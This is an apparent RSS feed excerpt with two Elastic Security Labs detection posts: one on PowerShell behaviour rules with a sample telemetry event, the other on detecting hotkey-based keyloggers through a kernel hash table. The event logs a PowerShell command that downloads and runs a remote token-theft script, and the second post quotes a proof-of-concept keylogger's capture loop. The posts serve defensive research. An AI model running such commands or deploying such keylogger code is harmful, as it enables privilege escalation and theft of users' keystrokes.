not (process.Ext.api.name == &quot;WriteProcessMemory&quot; and
     process.Ext.api.metadata.target_address_name in (&quot;PEB&quot;, &quot;PEB32&quot;, &quot;ProcessStartupInfo&quot;, &quot;Data&quot;) and
     _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info like (&quot;?:\\windows\\*\\kernelbase.dll!CreateProcess*&quot;, &quot;Unknown&quot;)))
</code></pre>
<p>Even though we don’t need to use the brittle PowerShell AMSI logging for detection, we can still provide this detail in the event as context as it assists with triage.  This modality-based approach even detects common PowerShell defence evasion tradecraft such as:</p>
<ul>
<li>ntdll unhooking</li>
<li>AMSI patching</li>
<li>user-mode ETW patching</li>
</ul>
<pre><code class="language-json">{
 &quot;event&quot;: {
  &quot;provider&quot;: &quot;Microsoft-Windows-Threat-Intelligence&quot;,
  &quot;created&quot;: &quot;2025-01-29T18:27:09.4386902Z&quot;,
  &quot;kind&quot;: &quot;event&quot;,
  &quot;category&quot;: &quot;api&quot;,
  &quot;type&quot;: &quot;change&quot;,
  &quot;outcome&quot;: &quot;unknown&quot;
 },
 &quot;message&quot;: &quot;Endpoint API event - VirtualProtect&quot;,
 &quot;process&quot;: {
  &quot;parent&quot;: {
   &quot;executable&quot;: &quot;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&quot;
  },
  &quot;name&quot;: &quot;powershell.exe&quot;,
  &quot;executable&quot;: &quot;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&quot;,
  &quot;code_signature&quot;: {
   &quot;trusted&quot;: true,
   &quot;subject_name&quot;: &quot;Microsoft Windows&quot;,
   &quot;exists&quot;: true,
   &quot;status&quot;: &quot;trusted&quot;
  },
  &quot;command_line&quot;: &quot;\&quot;powershell.exe\&quot; &amp; {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}&quot;,
  &quot;pid&quot;: 21908,
  &quot;Ext&quot;: {
   &quot;api&quot;: {
    &quot;summary&quot;: &quot;VirtualProtect( kernel32.dll!FatalExit, 0x21, RWX, R-X )&quot;,
    &quot;metadata&quot;: {
     &quot;target_address_path&quot;: &quot;c:\\windows\\system32\\kernel32.dll&quot;,
     &quot;amsi_logs&quot;: [
      {
       &quot;entries&quot;: [
        &quot;&amp; {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}&quot;,
        &quot;{iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}&quot;,
        &quot;function Get-WinLogonTokenSystem\n{\nfunction _10001011000101101\n{\n  [CmdletBinding()]\n  Param(\n [Parameter(Position = 0, Mandatory = $true)]\n [ValidateNotNullOrEmpty()]\n [Byte[]]\n ${_00110111011010011},\n ...&lt;truncated&gt;&quot;,
        &quot;{[Char] $_}&quot;,
        &quot;{\n [CmdletBinding()]\n Param(\n   [Parameter(Position = 0, Mandatory = $true)]\n   [Byte[]]\n   ${_00110111011010011},\n   [Parameter(Position = 1, Mandatory = $true)]\n   [String]\n   ${_10100110010101100},\n ...&lt;truncated&gt;&quot;,
        &quot;{ $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) }&quot;
       ],
       &quot;type&quot;: &quot;PowerShell&quot;
      }
     ],
     &quot;target_address_name&quot;: &quot;kernel32.dll!FatalExit&quot;,
     &quot;amsi_filenames&quot;: [
      &quot;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1&quot;,
      &quot;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1&quot;
     ]
    },
    &quot;behaviors&quot;: [
     &quot;sensitive_api&quot;,
     &quot;hollow_image&quot;,
     &quot;unbacked_rwx&quot;
    ],
    &quot;name&quot;: &quot;VirtualProtect&quot;,
    &quot;parameters&quot;: {
     &quot;address&quot;: 140727652261072,
     &quot;size&quot;: 33,
     &quot;protection_old&quot;: &quot;R-X&quot;,
     &quot;protection&quot;: &quot;RWX&quot;
    }
   },
   &quot;code_signature&quot;: [
    {
     &quot;trusted&quot;: true,
     &quot;subject_name&quot;: &quot;Microsoft Windows&quot;,
     &quot;exists&quot;: true,
     &quot;status&quot;: &quot;trusted&quot;
    }
   ],
   &quot;token&quot;: {
    &quot;integrity_level_name&quot;: &quot;high&quot;
   }
  },
  &quot;thread&quot;: {
   &quot;Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|kernelbase.dll|Unbacked&quot;,
    &quot;call_stack_contains_unbacked&quot;: true,
    &quot;call_stack&quot;: [
     {
      &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14&quot;
     },
     {
      &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x3b&quot;
     },
     {
      &quot;symbol_info&quot;: &quot;Unbacked+0x3b5c&quot;,
      &quot;protection_provenance&quot;: &quot;clr.dll&quot;,
      &quot;callsite_trailing_bytes&quot;: &quot;41c644240c01833dab99f35f007406ff15b7b6f25f8bf0e85883755f85f60f95c00fb6c00fb6c041c644240c01488b55884989542410488d65c85b5e5f415c41&quot;,
      &quot;protection&quot;: &quot;RWX&quot;,
      &quot;callsite_leading_bytes&quot;: &quot;df765f4d63f64c897dc0488d55b8488bcee8ee6da95f4d8bcf488bcf488bd34d8bc64533db4c8b55b84c8955904c8d150c0000004c8955a841c644240c00ffd0&quot;
     }
    ],
    &quot;call_stack_final_user_module&quot;: {
     &quot;code_signature&quot;: [
      {
       &quot;trusted&quot;: true,
       &quot;subject_name&quot;: &quot;Microsoft Corporation&quot;,
       &quot;exists&quot;: true,
       &quot;status&quot;: &quot;trusted&quot;
      }
     ],
     &quot;protection_provenance_path&quot;: &quot;c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll&quot;,
     &quot;name&quot;: &quot;Unbacked&quot;,
     &quot;protection_provenance&quot;: &quot;clr.dll&quot;,
     &quot;protection&quot;: &quot;RWX&quot;,
     &quot;hash&quot;: {
      &quot;sha256&quot;: &quot;707564fc98c58247d088183731c2e5a0f51923c6d9a94646b0f2158eb5704df4&quot;
     }
    }
   },
   &quot;id&quot;: 17260
  }
 },
 &quot;user&quot;: {
  &quot;id&quot;: &quot;S-1-5-21-47396387-2833971351-1621354421-500&quot;
 }
}
</code></pre>
<h2><strong>Robustness assessment</strong></h2>
<p>Using the <a href="https://ctid.mitre.org/projects/summiting-the-pyramid/">Summiting the Pyramid</a> analytic scoring methodology, we can compare our PowerShell modality-based detection rule with traditional PowerShell content-based detections.</p>
<table>
<thead>
<tr>
<th align="left"></th>
<th align="left">Application (A)</th>
<th align="left">User mode (U)</th>
<th align="left">Kernel mode (K)</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Core to (Sub) Technique (5)</strong></td>
<td align="left"></td>
<td align="left"></td>
<td align="left"><strong>[ best ]</strong> Kernel ETW-based PowerShell modality detections</td>
</tr>
<tr>
<td align="left"><strong>Core to Part of (Sub-) Technique (4)</strong></td>
<td align="left"></td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left"><strong>Core to Pre-Existing Tool (3)</strong></td>
<td align="left"></td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left"><strong>Core to Adversary-brought Tool (2)</strong></td>
<td align="left">AMSI and ScriptBlock-based PowerShell content detections</td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left"><strong>Ephemeral (1)</strong></td>
<td align="left"><strong>[ worst ]</strong></td>
<td align="left"></td>
<td align="left"></td>
</tr>
</tbody>
</table>
<p>PowerShell Analytic Scoring using <a href="https://ctid.mitre.org/projects/summiting-the-pyramid/">Summiting the Pyramid</a></p>
<p>As noted earlier, most PowerShell detections receive a low 2A robustness score using the STP scale.  This is in stark contrast to our <a href="https://github.com/elastic/protections-artifacts/blob/065efe897b511e9df5116f9f96b6cbabb68bf1e4/behavior/rules/windows/execution_suspicious_api_call_from_a_powershell_script.toml">PowerShell misbehaving modality rule</a> which receives the highest possible 5K score (where appropriate kernel telemetry is available from Microsoft).</p>
<p>One caveat is that an STP analytic score does not yet include any measure of the setup and maintenance costs of a rule. This could potentially be approximated by the size of the known false positive software list for a given rule - though most open rule sets typically do not include this information. We do, and in our rule’s case the false positives observed to date have been extremely manageable.</p>
<h2><strong>Can call stacks be spoofed though?</strong></h2>
<p>Yes - and slightly no. Our call stacks are all collected inline in the kernel, but the user-mode call stack itself resides in user-mode memory that the malware may control. This means that, if malware has achieved arbitrary execution, then it can control the stack frames that we see.</p>
<p>Sure, dual-purpose API <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Unbacked+memory%22&amp;type=code">calls from private memory</a> are suspicious, but sometimes trying to hide your private memory is even more suspicious. This can take the form of:</p>
<ul>
<li>Calls from <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+allocation_private_bytes&amp;type=code">overwritten modules</a>.</li>
<li>Return addresses <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+image_rop&amp;type=code">without a preceding call</a> instruction.</li>
<li>Calls <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+proxy_call&amp;type=code">proxied via other modules</a>.</li>
</ul>
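<p>The second tell lends itself to a compact check: a genuine return address should be immediately preceded by some x64 <code>call</code> encoding. The sketch below assumes the captured leading bytes end exactly at the return address and checks only the two most common encodings (<code>E8 rel32</code> and the <code>FF /2</code> family, i.e. a ModRM reg field of 2); a real disassembly-based validation has to handle many more cases.</p>

```python
def preceded_by_call(leading_bytes_hex):
    '''Heuristic: do the bytes before a return address decode to a call?'''
    raw = bytes.fromhex(leading_bytes_hex)
    if raw[-5:-4] == b'\xe8':
        return True  # call rel32 (E8, 5 bytes)
    if raw[-2:-1] == b'\xff' and raw[-1] // 8 % 8 == 2:
        return True  # e.g. call rax (FF D0, 2 bytes; ModRM reg field == 2)
    if raw[-6:-5] == b'\xff' and raw[-5] // 8 % 8 == 2:
        return True  # e.g. call [rip+disp32] (FF 15, 6 bytes)
    return False
```

A return address failing this check corresponds to the <code>image_rop</code> behaviour tag described earlier.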
<p>Call stack control alone may not be enough. In order to truly bypass some of our call stack detections, an attacker must craft a call stack that blends entirely with normal activity. In some environments this can be baselined by security teams with high accuracy, making it hard for attackers to remain undetected. Based on our in-house research, and with the assistance of red team tool developers, we are also continually improving our out-of-the-box detections.</p>
<p>Finally, on modern CPUs there are also numerous execution trace mechanisms that can be used to detect stack spoofing - such as <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Pierce-Capturing-0days-With-PERFectly-Placed-Hardware-Traps-wp.pdf">Intel LBR</a>, Intel BTS, Intel AET, <a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Intel IPT</a>, <a href="https://www.elastic.co/kr/security-labs/finding-truth-in-the-shadows">x64 CET</a> and <a href="https://lwn.net/Articles/824613/">x64 Architectural LBR</a>. Elastic already takes advantage of some of these hardware features; we have suggested to Microsoft that they may also wish to do so in further scenarios outside of exploit protection, and we are investigating further enhancements ourselves. Stay tuned.</p>
<h2>Conclusion</h2>
<p>Execution Modality is a new lens through which we can seek to understand attacker tradecraft.</p>
<p>Detecting specific techniques for individual modalities is not a cost-effective approach, though - there are simply too many techniques and too many modalities. Instead, we should focus our technique detections as close to the operating system's source of truth as possible, being careful not to lose necessary activity context or to introduce unmanageable false positives. This is why Elastic considers <a href="https://www.elastic.co/kr/security-labs/kernel-etw-best-etw">Kernel ETW</a> superior to user-mode <code>ntdll</code> hooking - being closer to the source of truth allows more robust detections.</p>
<p>For modality-based detection approaches, the value becomes apparent when we baseline <strong>all</strong> expected low-level telemetry for a given modality - and trigger on <strong>any</strong> deviations.</p>
<p>Historically, attackers have been able to choose a modality for convenience: it is more cost-effective to write tools in C# or PowerShell than in C or assembly. If we can herd attackers out of their preferred modalities, we have imposed cost.</p>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/misbehaving-modalities/modalities.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure]]></title>
            <link>https://www.elastic.co/kr/security-labs/detecting-hotkey-based-keyloggers</link>
            <guid>detecting-hotkey-based-keyloggers</guid>
            <pubDate>Tue, 04 Mar 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we explore what hotkey-based keyloggers are and how to detect them. Specifically, we explain how these keyloggers intercept keystrokes, then present a detection technique that leverages an undocumented hotkey table in kernel space.]]></description>
            <content:encoded><![CDATA[<h1>Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure</h1>
<p>In this article, we explore what hotkey-based keyloggers are and how to detect them. Specifically, we explain how these keyloggers intercept keystrokes, then present a detection technique that leverages an undocumented hotkey table in kernel space.</p>
<h2>Introduction</h2>
<p>In May 2024, Elastic Security Labs published <a href="https://www.elastic.co/kr/security-labs/protecting-your-devices-from-information-theft-keylogger-protection">an article</a> highlighting new features added in <a href="https://www.elastic.co/kr/guide/en/integrations/current/endpoint.html">Elastic Defend</a> (starting with 8.12) to enhance the detection of keyloggers running on Windows. In that post, we covered four types of keyloggers commonly employed in cyberattacks — polling-based keyloggers, hooking-based keyloggers, keyloggers using the Raw Input Model, and keyloggers using DirectInput — and explained our detection methodology. In particular, we introduced a behavior-based detection method using the Microsoft-Windows-Win32k provider within <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/event-tracing-for-windows--etw-">Event Tracing for Windows</a> (ETW).</p>
<p>Shortly after publication, we were honored to have our article noticed by <a href="https://jonathanbaror.com/">Jonathan Bar Or</a>, Principal Security Researcher at Microsoft. He provided invaluable feedback by pointing out the existence of hotkey-based keyloggers and even shared proof-of-concept (PoC) code with us. Leveraging his PoC code <a href="https://github.com/yo-yo-yo-jbo/hotkeyz">Hotkeyz</a> as a starting point, this article presents one potential method for detecting hotkey-based keyloggers.</p>
<h2>Overview of Hotkey-based Keyloggers</h2>
<h3>What Is a Hotkey?</h3>
<p>Before delving into hotkey-based keyloggers, let’s first clarify what a hotkey is. A hotkey is a type of keyboard shortcut that directly invokes a specific function on a computer by pressing a single key or a combination of keys. For example, many Windows users press <strong>Alt + Tab</strong> to switch between tasks (or, in other words, windows). In this instance, <strong>Alt + Tab</strong> serves as a hotkey that directly triggers the task-switching function.</p>
<p><em>(Note: Although other types of keyboard shortcuts exist, this article focuses solely on hotkeys. Also, <strong>all information herein is based on Windows 10 version 22H2 OS Build 19045.5371 without virtualization-based security</strong>. Please note that the internal data structures and behavior may differ in other versions of Windows.)</em></p>
<h3>Abusing Custom Hotkey Registration Functionality</h3>
<p>In addition to using the pre-configured hotkeys in Windows as shown in the previous example, you can also register your own custom hotkeys. There are various methods to do this, but one straightforward approach is to use the Windows API function <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerhotkey"><strong>RegisterHotKey</strong></a>, which allows a user to register a specific key as a hotkey. For instance, the following code snippet demonstrates how to use the <strong>RegisterHotKey</strong> API to register the <strong>A</strong> key (with a <a href="https://learn.microsoft.com/en-us/windows/win32/inputdev/virtual-key-codes">virtual-key code</a> of 0x41) as a global hotkey:</p>
<pre><code class="language-c">/*
BOOL RegisterHotKey(
  [in, optional] HWND hWnd, 
  [in]           int  id,
  [in]           UINT fsModifiers,
  [in]           UINT vk
);
*/
RegisterHotKey(NULL, 1, 0, 0x41);
</code></pre>
<p>After registering a hotkey, when the registered key is pressed, a <a href="https://learn.microsoft.com/en-us/windows/win32/inputdev/wm-hotkey"><strong>WM_HOTKEY</strong></a> message is sent to the message queue of the window specified as the first argument to the <strong>RegisterHotKey</strong> API (or to the thread that registered the hotkey if <strong>NULL</strong> is used). The code below demonstrates a message loop that uses the <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getmessage"><strong>GetMessage</strong></a> API to check for a <strong>WM_HOTKEY</strong> message in the <a href="https://learn.microsoft.com/en-us/windows/win32/winmsg/about-messages-and-message-queues">message queue</a>, and if one is received, it extracts the virtual-key code (in this case, 0x41) from the message.</p>
<pre><code class="language-c">MSG msg = { 0 };
while (GetMessage(&amp;msg, NULL, 0, 0)) {
    if (msg.message == WM_HOTKEY) {
        int vkCode = HIWORD(msg.lParam);
        std::cout &lt;&lt; &quot;WM_HOTKEY received! Virtual-Key Code: 0x&quot;
            &lt;&lt; std::hex &lt;&lt; vkCode &lt;&lt; std::dec &lt;&lt; std::endl;
    }
}
</code></pre>
<p>In other words, imagine you're writing something in a notepad application. If the A key is pressed, the character won't be treated as normal text input — it will be recognized as a global hotkey instead.</p>
<p>In this example, only the A key is registered as a hotkey. However, you can register multiple keys (like B, C, or D) as separate hotkeys at the same time. This means that any key (i.e., any virtual-key code) that can be registered with the <strong>RegisterHotKey</strong> API can potentially be hijacked as a global hotkey. A hotkey-based keylogger abuses this capability to capture the keystrokes entered by the user.</p>
<p>Based on our testing, we found that not only alphanumeric and basic symbol keys, but also those keys combined with the SHIFT modifier, can all be registered as hotkeys using the <strong>RegisterHotKey</strong> API. This means a keylogger can effectively monitor every keystroke needed to steal sensitive information.</p>
<h3>Capturing Keystrokes Stealthily</h3>
<p>Let's walk through the actual process of how a hotkey-based keylogger captures keystrokes, using the Hotkeyz hotkey-based keylogger as an example.</p>
<p>Hotkeyz first registers each alphanumeric virtual-key code - and some additional keys, such as <strong>VK_SPACE</strong> and <strong>VK_RETURN</strong> - as individual hotkeys using the <strong>RegisterHotKey</strong> API.</p>
<p>Then, inside the keylogger's message loop, the <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-peekmessagew"><strong>PeekMessageW</strong></a> API is used to check whether any <strong>WM_HOTKEY</strong> messages from these registered hotkeys have appeared in the message queue. When a <strong>WM_HOTKEY</strong> message is detected, the virtual-key code it contains is extracted and eventually saved to a text file. Below is an excerpt from the message loop code, highlighting the most important parts.</p>
<pre><code class="language-c">while (...)
{
    // Get the message in a non-blocking manner and poll if necessary
    if (!PeekMessageW(&amp;tMsg, NULL, WM_HOTKEY, WM_HOTKEY, PM_REMOVE))
    {
        Sleep(POLL_TIME_MILLIS);
        continue;
    }
....
   // Get the key from the message
   cCurrVk = (BYTE)((((DWORD)tMsg.lParam) &amp; 0xFFFF0000) &gt;&gt; 16);

   // Send the key to the OS and re-register
   (VOID)UnregisterHotKey(NULL, adwVkToIdMapping[cCurrVk]);
   keybd_event(cCurrVk, 0, 0, (ULONG_PTR)NULL);
   if (!RegisterHotKey(NULL, adwVkToIdMapping[cCurrVk], 0, cCurrVk))
   {
       adwVkToIdMapping[cCurrVk] = 0;
       DEBUG_MSG(L&quot;RegisterHotKey() failed for re-registration (cCurrVk=%lu,    LastError=%lu).&quot;, cCurrVk, GetLastError());
       goto lblCleanup;
   }
   // Write to the file
  if (!WriteFile(hFile, &amp;cCurrVk, sizeof(cCurrVk), &amp;cbBytesWritten, NULL))
  {
....
</code></pre>
<p>One important detail is this: to avoid alerting the user to the keylogger's presence, once the virtual-key code is extracted from the message, the key's hotkey registration is temporarily removed using the <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-unregisterhotkey"><strong>UnregisterHotKey</strong></a> API. After that, the key press is simulated with <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-keybd_event"><strong>keybd_event</strong></a> so that it appears to the user as if the key was pressed normally. Once the key press is simulated, the key is re-registered using the <strong>RegisterHotKey</strong> API to wait for further input. This is the core mechanism behind how a hotkey-based keylogger operates.</p>
<h2>Detecting Hotkey-Based Keyloggers</h2>
<p>Now that we understand what hotkey-based keyloggers are and how they operate, let's explain how to detect them.</p>
<h3>ETW Does Not Monitor the RegisterHotKey API</h3>
<p>Following the approach described in an earlier article, we first investigated whether <a href="https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing">Event Tracing for Windows</a> (ETW) could be used to detect hotkey-based keyloggers. Our research quickly revealed that ETW currently does not monitor the <strong>RegisterHotKey</strong> or <strong>UnregisterHotKey</strong> APIs. In addition to reviewing the manifest file for the Microsoft-Windows-Win32k provider, we reverse-engineered the internals of the <strong>RegisterHotKey</strong> API — specifically, the <strong>NtUserRegisterHotKey</strong> function in win32kfull.sys. Unfortunately, we found no evidence that these APIs trigger any ETW events when executed.</p>
<p>The image below shows a comparison between the decompiled code for <strong>NtUserGetAsyncKeyState</strong> (which is monitored by ETW) and <strong>NtUserRegisterHotKey</strong>. Notice that at the beginning of <strong>NtUserGetAsyncKeyState</strong>, there is a call to <strong>EtwTraceGetAsyncKeyState</strong> - a function associated with logging ETW events - while <strong>NtUserRegisterHotKey</strong> does not contain such a call.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image3.png" alt="Figure 1: Comparison of the Decompiled Code for NtUserGetAsyncKeyState and NtUserRegisterHotKey" /></p>
<p>Although we also considered using ETW providers other than Microsoft-Windows-Win32k to indirectly monitor calls to the <strong><code>RegisterHotKey</code></strong> API, we found that the detection method using the &quot;hotkey table&quot; - introduced next, and not reliant on ETW - achieves results comparable to or better than monitoring the <strong><code>RegisterHotKey</code></strong> API. In the end, we chose to implement this method.</p>
<h3>Detection Using the Hotkey Table (<strong>gphkHashTable</strong>)</h3>
<p>After discovering that ETW cannot directly monitor calls to the <strong>RegisterHotKey</strong> API, we started exploring detection methods that don't rely on ETW. During our investigation, we wondered, &quot;Isn't the information for registered hotkeys stored somewhere? And if so, could that data be used for detection?&quot; Based on that hypothesis, we quickly found a hash table labeled <strong>gphkHashTable</strong> within <strong>NtUserRegisterHotKey</strong>. Searching Microsoft's online documentation revealed no details on <strong>gphkHashTable</strong>, suggesting that it's an undocumented kernel data structure.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image1.png" alt="Figure 2: The hotkey table (gphkHashTable), discovered within the RegisterHotKey function called inside NtUserRegisterHotKey" /></p>
<p>Through reverse engineering, we discovered that this hash table stores objects containing information about registered hotkeys. Each object holds details such as the virtual-key code and modifiers specified in the arguments to the <strong>RegisterHotKey</strong> API. The right side of Figure 3 shows part of the structure definition for a hotkey object (named <strong>HOT_KEY</strong>), while the left side displays how the registered hotkey objects appear when accessed via WinDbg.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image4.png" alt="Figure 3: Hotkey Object Details. WinDbg view (left) and HOT_KEY structure details (right)" /></p>
<p>We also determined that <strong>gphkHashTable</strong> is structured as shown in Figure 4. Specifically, the table uses the virtual-key code (specified via the RegisterHotKey API) modulo 0x80 as its index. Hotkey objects sharing the same index are linked together in a list, which allows the table to store and manage hotkey information even when the virtual-key codes are identical but the modifiers differ.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image6.png" alt="Figure 4: Structure of gphkHashTable" /></p>
<p>In other words, by scanning all <strong>HOT_KEY</strong> objects stored in <strong>gphkHashTable</strong>, we can retrieve details about every registered hotkey. If we find that every main key - for example, each individual alphanumeric key - is registered as a separate hotkey, that strongly indicates the presence of an active hotkey-based keylogger.</p>
<h2>Implementing the Detection Tool</h2>
<p>Now, let's move on to implementing the detection tool. Since <strong>gphkHashTable</strong> resides in the kernel space, it cannot be accessed by a user-mode application. For this reason, it was necessary to develop a device driver for detection. More specifically, we decided to develop a device driver that obtains the address of <strong>gphkHashTable</strong> and scans through all the hotkey objects stored in the hash table. If the number of alphanumeric keys registered as hotkeys exceeds a predefined threshold, it will alert us to the potential presence of a hotkey-based keylogger.</p>
<h3>How to Obtain the Address of <strong>gphkHashTable</strong></h3>
<p>While developing the detection tool, one of the first challenges we faced was how to obtain the address of <strong>gphkHashTable</strong>. After some consideration, we decided to extract the address directly from an instruction in the <strong>win32kfull.sys</strong> driver that accesses <strong>gphkHashTable</strong>.</p>
<p>Through reverse engineering, we discovered that right at the beginning of the <strong>IsHotKey</strong> function there is a <code>lea</code> instruction (<code>lea rbx, gphkHashTable</code>) that accesses <strong>gphkHashTable</strong>. We used that instruction's opcode byte sequence (0x48, 0x8D, 0x1D) as a signature to locate it, then computed the address of <strong>gphkHashTable</strong> from the 32-bit (4-byte) offset that follows.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image5.png" alt="Figure 5: Inside the IsHotKey function" /></p>
<p>Additionally, since <strong>IsHotKey</strong> is not an exported function, we also need its address before we can look for <strong>gphkHashTable</strong>. Through further reverse engineering, we discovered that the exported function <strong>EditionIsHotKey</strong> calls <strong>IsHotKey</strong>, so we compute the address of <strong>IsHotKey</strong> within <strong>EditionIsHotKey</strong> using the same signature-based method described earlier. (For reference, the base address of <strong>win32kfull.sys</strong> can be found by walking the <strong>PsLoadedModuleList</strong> kernel structure.)</p>
<h3>Accessing the Memory Space of <strong>win32kfull.sys</strong></h3>
<p>Once we finalized our approach to obtaining the address of <strong>gphkHashTable</strong>, we began writing code to access the memory space of <strong>win32kfull.sys</strong> to retrieve that address. One challenge we encountered at this stage was that win32kfull.sys is a <em>session driver</em>. Before proceeding further, here’s a brief, simplified explanation of what a <em>session</em> is.</p>
<p>In Windows, when a user logs in, a separate session (with session numbers starting from 1) is assigned to each user. Simply put, the first user to log in is assigned <strong>Session 1</strong>. If another user logs in while that session is active, that user is assigned <strong>Session 2</strong>, and so on. Each user then has their own desktop environment within their assigned session.</p>
<p>Kernel data that must be managed separately for each session (i.e., per logged-in user) is stored in an isolated area of kernel memory called <em>session space</em>. This includes GUI objects managed by win32k drivers, such as windows and mouse/keyboard input data, ensuring that the screen and input remain properly separated between users.</p>
<p><em>(This is a simplified explanation. For a more detailed discussion on sessions, please refer to <a href="https://googleprojectzero.blogspot.com/2016/01/raising-dead.html">James Forshaw’s blog post</a>.)</em></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image2.png" alt="Figure 6: Overview of Sessions. Session 0 is dedicated exclusively to service processes" /></p>
<p>Based on the above, <strong>win32kfull.sys</strong> is known as a <em>session driver</em>. This means that, for example, hotkey information registered in the session of the first logged-in user (Session 1) can only be accessed from within that same session. So, how can we work around this limitation? In such cases, <a href="https://eversinc33.com/posts/kernel-mode-keylogging.html">it is known</a> that <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-kestackattachprocess"><strong>KeStackAttachProcess</strong></a> can be used.</p>
<p><strong>KeStackAttachProcess</strong> allows the current thread to temporarily attach to the address space of a specified process. If we can attach to a GUI process in the target session — more precisely, a process that has loaded <strong>win32kfull.sys</strong> — then we can access <strong>win32kfull.sys</strong> and its associated data within that session. For our implementation, assuming that only one user is logged in, we decided to locate and attach to <strong>winlogon.exe</strong>, the process responsible for handling user logon operations.</p>
<h3>Enumerating Registered Hotkeys</h3>
<p>Once we have successfully attached to the winlogon.exe process and determined the address of <strong>gphkHashTable</strong>, the next step is simply scanning <strong>gphkHashTable</strong> to check the registered hotkeys. Below is an excerpt of that code:</p>
<pre><code class="language-c">BOOL CheckRegisteredHotKeys(_In_ const PVOID&amp; gphkHashTableAddr)
{
-[skip]-
    // Cast the gphkHashTable address to an array of pointers.
    PVOID* tableArray = static_cast&lt;PVOID*&gt;(gphkHashTableAddr);
    // Iterate through the hash table entries.
    for (USHORT j = 0; j &lt; 0x80; j++)
    {
        PVOID item = tableArray[j];
        PHOT_KEY hk = reinterpret_cast&lt;PHOT_KEY&gt;(item);
        if (hk)
        {
            CheckHotkeyNode(hk);
        }
    }
-[skip]-
}

VOID CheckHotkeyNode(_In_ const PHOT_KEY&amp; hk)
{
    if (MmIsAddressValid(hk-&gt;pNext)) {
        CheckHotkeyNode(hk-&gt;pNext);
    }

    // Check whether this is a single numeric hotkey.
    if ((hk-&gt;vk &gt;= 0x30) &amp;&amp; (hk-&gt;vk &lt;= 0x39) &amp;&amp; (hk-&gt;modifiers1 == 0))
    {
        KdPrint((&quot;[+] hk-&gt;id: %u hk-&gt;vk: %x\n&quot;, hk-&gt;id, hk-&gt;vk));
        hotkeyCounter++;
    }
    // Check whether this is a single alphabet hotkey.
    else if ((hk-&gt;vk &gt;= 0x41) &amp;&amp; (hk-&gt;vk &lt;= 0x5A) &amp;&amp; (hk-&gt;modifiers1 == 0))
    {
        KdPrint((&quot;[+] hk-&gt;id: %u hk-&gt;vk: %x\n&quot;, hk-&gt;id, hk-&gt;vk));
        hotkeyCounter++;
    }
-[skip]-
}
....
if (CheckRegisteredHotKeys(gphkHashTableAddr) &amp;&amp; hotkeyCounter &gt;= 36)
{
   detected = TRUE;
   goto Cleanup;
}
</code></pre>
<p>The code itself is straightforward: it iterates through each index of the hash table, following the linked list to access every <strong>HOT_KEY</strong> object, and checks whether the registered hotkeys correspond to alphanumeric keys without any modifiers. In our detection tool, if every alphanumeric key is registered as a hotkey, an alert is raised, indicating the possible presence of a hotkey-based keylogger. For simplicity, this implementation only targets alphanumeric key hotkeys, although it would be easy to extend the tool to check for hotkeys with modifiers such as <strong>SHIFT</strong>.</p>
<h3>Detecting Hotkeyz</h3>
